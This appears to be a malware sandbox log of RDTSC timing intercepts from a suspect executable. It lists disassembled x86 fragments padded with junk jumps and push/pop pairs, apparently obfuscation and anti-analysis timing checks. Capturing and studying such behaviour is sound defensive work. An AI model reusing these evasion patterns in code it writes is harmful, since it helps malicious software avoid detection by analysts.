Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0065A second address: 6F00677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00677 second address: 6F00687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00787 second address: 6F0078B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0078B second address: 6F00791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00791 second address: 6F007AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F007AA second address: 6F0087F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c pushad 0x0000000d mov bh, AEh 0x0000000f jmp 00007FFA692CA424h 0x00000014 popad 0x00000015 mov ax, word ptr [ebx+00000088h] 0x0000001c pushad 0x0000001d mov al, CAh 0x0000001f pushfd 0x00000020 jmp 00007FFA692CA423h 0x00000025 sub ah, 0000005Eh 0x00000028 jmp 00007FFA692CA429h 0x0000002d popfd 0x0000002e popad 0x0000002f mov word ptr [esi+32h], ax 0x00000033 jmp 00007FFA692CA41Eh 0x00000038 mov eax, dword ptr [ebx+0000008Ch] 0x0000003e jmp 00007FFA692CA420h 0x00000043 mov dword ptr [esi+34h], eax 0x00000046 pushad 0x00000047 mov ecx, 33BBAA5Dh 0x0000004c pushfd 0x0000004d jmp 00007FFA692CA41Ah 0x00000052 jmp 00007FFA692CA425h 0x00000057 popfd 0x00000058 popad 0x00000059 mov eax, dword ptr [ebx+18h] 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f pushfd 0x00000060 jmp 00007FFA692CA41Ah 0x00000065 sub cx, 4518h 0x0000006a jmp 00007FFA692CA41Bh 0x0000006f popfd 0x00000070 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0087F second address: 6F00883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00883 second address: 6F008E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FFA692CA426h 0x0000000c adc ecx, 5BF32F78h 0x00000012 jmp 00007FFA692CA41Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esi+38h], eax 0x0000001c pushad 0x0000001d pushad 0x0000001e mov ax, 15C1h 0x00000022 mov si, 4CFDh 0x00000026 popad 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+1Ch] 0x0000002b jmp 00007FFA692CA424h 0x00000030 mov dword ptr [esi+3Ch], eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 mov ah, B3h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F008E1 second address: 6F008F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+20h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA68B945BAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F008F7 second address: 6F0091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bl, FCh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+40h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFA692CA425h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0091B second address: 6F00945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFA68B945BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00945 second address: 6F0094B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0094B second address: 6F00988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d jmp 00007FFA68B945C6h 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, EBD0h 0x0000001a mov cx, dx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00988 second address: 6F0099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA421h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0099D second address: 6F009C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFA68B945BCh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFA68B945BAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F009C1 second address: 6F009C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F009C7 second address: 6F009F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007FFA68B945C0h 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00A93 second address: 6F00AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FFAD7CF9029h 0x0000000f pushad 0x00000010 movzx esi, dx 0x00000013 pushfd 0x00000014 jmp 00007FFA692CA429h 0x00000019 and si, 5E06h 0x0000001e jmp 00007FFA692CA421h 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [ebp-0Ch] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00AF5 second address: 6F00B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00B08 second address: 6F00B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00B0D second address: 6F00B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00B13 second address: 6F00B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+04h], eax 0x0000000a pushad 0x0000000b jmp 00007FFA692CA427h 0x00000010 mov bl, ch 0x00000012 popad 0x00000013 lea eax, dword ptr [ebx+78h] 0x00000016 pushad 0x00000017 mov ecx, edx 0x00000019 jmp 00007FFA692CA41Dh 0x0000001e popad 0x0000001f push 00000001h 0x00000021 jmp 00007FFA692CA41Eh 0x00000026 nop 0x00000027 pushad 0x00000028 mov cx, DF2Dh 0x0000002c mov cx, 4129h 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FFA692CA421h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00B7D second address: 6F00B92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00B92 second address: 6F00BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3E942172h 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00BA6 second address: 6F00BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00BAC second address: 6F00C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FFA692CA425h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 jmp 00007FFA692CA427h 0x00000016 nop 0x00000017 jmp 00007FFA692CA426h 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ebx, 4953C5F4h 0x00000023 pushfd 0x00000024 jmp 00007FFA692CA41Dh 0x00000029 and eax, 21561FB6h 0x0000002f jmp 00007FFA692CA421h 0x00000034 popfd 0x00000035 popad 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00C30 second address: 6F00C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00C36 second address: 6F00C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA421h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00C73 second address: 6F00C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00C85 second address: 6F00C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA41Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00C9B second address: 6F00D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FFA68B945C6h 0x00000010 js 00007FFAD75C2FADh 0x00000016 jmp 00007FFA68B945C0h 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e pushad 0x0000001f call 00007FFA68B945BEh 0x00000024 mov si, B921h 0x00000028 pop esi 0x00000029 pushfd 0x0000002a jmp 00007FFA68B945C7h 0x0000002f or ax, 6FCEh 0x00000034 jmp 00007FFA68B945C9h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+08h], eax 0x0000003e jmp 00007FFA68B945BEh 0x00000043 lea eax, dword ptr [ebx+70h] 0x00000046 jmp 00007FFA68B945C0h 0x0000004b push 00000001h 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFA68B945C7h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00D66 second address: 6F00DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA41Fh 0x00000008 pushfd 0x00000009 jmp 00007FFA692CA428h 0x0000000e sbb ax, 6038h 0x00000013 jmp 00007FFA692CA41Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d pushad 0x0000001e call 00007FFA692CA424h 0x00000023 mov ax, 12F1h 0x00000027 pop ecx 0x00000028 mov edi, 6D9DE262h 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00DCD second address: 6F00DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00DD1 second address: 6F00DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00DE6 second address: 6F00E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFA68B945BEh 0x0000000f lea eax, dword ptr [ebp-18h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00E26 second address: 6F00E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA692CA41Fh 0x00000009 jmp 00007FFA692CA423h 0x0000000e popfd 0x0000000f call 00007FFA692CA428h 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 jmp 00007FFA692CA41Eh 0x0000001e mov dword ptr [esp], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFA692CA427h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00E94 second address: 6F00EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA68B945BFh 0x00000009 sbb cx, 22EEh 0x0000000e jmp 00007FFA68B945C9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00F24 second address: 6F00F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA692CA41Fh 0x00000008 pop esi 0x00000009 mov bx, 8B6Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test edi, edi 0x00000012 jmp 00007FFA692CA41Bh 0x00000017 js 00007FFAD7CF8B7Ah 0x0000001d pushad 0x0000001e push ecx 0x0000001f mov cx, dx 0x00000022 pop edx 0x00000023 popad 0x00000024 mov eax, dword ptr [ebp-14h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx ebx, cx 0x0000002d mov edx, eax 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00F64 second address: 6F01015 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 407970DAh 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop eax 0x00000013 mov edi, 5B52B718h 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007FFA68B945C1h 0x0000001f adc si, 8A06h 0x00000024 jmp 00007FFA68B945C1h 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esi+0Ch], eax 0x0000002e pushad 0x0000002f mov al, 72h 0x00000031 pushfd 0x00000032 jmp 00007FFA68B945C9h 0x00000037 xor eax, 7BAD9216h 0x0000003d jmp 00007FFA68B945C1h 0x00000042 popfd 0x00000043 popad 0x00000044 mov edx, 759B06ECh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FFA68B945C3h 0x00000052 jmp 00007FFA68B945C3h 0x00000057 popfd 0x00000058 mov si, 375Fh 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01015 second address: 6F01062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA425h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FFA692CA427h 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFA692CA425h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01062 second address: 6F01072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01072 second address: 6F010A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c jmp 00007FFA692CA426h 0x00000011 test eax, eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov al, 4Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F010A1 second address: 6F010F7 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 38F2E72Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movsx edx, ax 0x0000000c popad 0x0000000d jne 00007FFAD75C2BE4h 0x00000013 pushad 0x00000014 mov dh, ch 0x00000016 pushfd 0x00000017 jmp 00007FFA68B945BFh 0x0000001c sub ah, FFFFFFDEh 0x0000001f jmp 00007FFA68B945C9h 0x00000024 popfd 0x00000025 popad 0x00000026 mov edx, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FFA68B945BDh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F010F7 second address: 6F01114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01114 second address: 6F01118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01118 second address: 6F0111C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0111C second address: 6F01122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01122 second address: 6F01140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA422h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01140 second address: 6F01144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01144 second address: 6F0114A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0114A second address: 6F011BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA68B945C1h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+04h] 0x0000000f jmp 00007FFA68B945C7h 0x00000014 mov dword ptr [edx+04h], eax 0x00000017 pushad 0x00000018 mov ax, B74Bh 0x0000001c jmp 00007FFA68B945C0h 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+08h] 0x00000025 pushad 0x00000026 mov al, 23h 0x00000028 movsx edx, si 0x0000002b popad 0x0000002c mov dword ptr [edx+08h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007FFA68B945C7h 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F011BE second address: 6F011C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F011C4 second address: 6F011C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F011C8 second address: 6F01268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+0Ch] 0x0000000b jmp 00007FFA692CA423h 0x00000010 mov dword ptr [edx+0Ch], eax 0x00000013 pushad 0x00000014 mov ebx, eax 0x00000016 movzx eax, bx 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+10h] 0x0000001d jmp 00007FFA692CA423h 0x00000022 mov dword ptr [edx+10h], eax 0x00000025 jmp 00007FFA692CA426h 0x0000002a mov eax, dword ptr [esi+14h] 0x0000002d pushad 0x0000002e call 00007FFA692CA41Eh 0x00000033 mov si, 40A1h 0x00000037 pop ecx 0x00000038 jmp 00007FFA692CA427h 0x0000003d popad 0x0000003e mov dword ptr [edx+14h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FFA692CA425h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01268 second address: 6F0128C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, DF5Eh 0x00000013 mov dx, 936Ah 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0139B second address: 6F013A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F013A1 second address: 6F0140F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFA68B945BEh 0x0000000b and esi, 678063F8h 0x00000011 jmp 00007FFA68B945BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ecx, dword ptr [esi+2Ch] 0x0000001d pushad 0x0000001e mov dx, ax 0x00000021 pushfd 0x00000022 jmp 00007FFA68B945C0h 0x00000027 sbb eax, 323D3E58h 0x0000002d jmp 00007FFA68B945BBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [edx+2Ch], ecx 0x00000037 pushad 0x00000038 call 00007FFA68B945C4h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0140F second address: 6F01439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FFA692CA421h 0x0000000a popad 0x0000000b mov ax, word ptr [esi+30h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFA692CA41Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01439 second address: 6F01459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dh, 7Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01459 second address: 6F0145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0145E second address: 6F01474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, bx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01474 second address: 6F014CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d jmp 00007FFA692CA420h 0x00000012 mov eax, dword ptr [esi+34h] 0x00000015 jmp 00007FFA692CA420h 0x0000001a mov dword ptr [edx+34h], eax 0x0000001d jmp 00007FFA692CA420h 0x00000022 test ecx, 00000700h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov eax, edi 0x0000002f popad 0x00000030 rdtsc
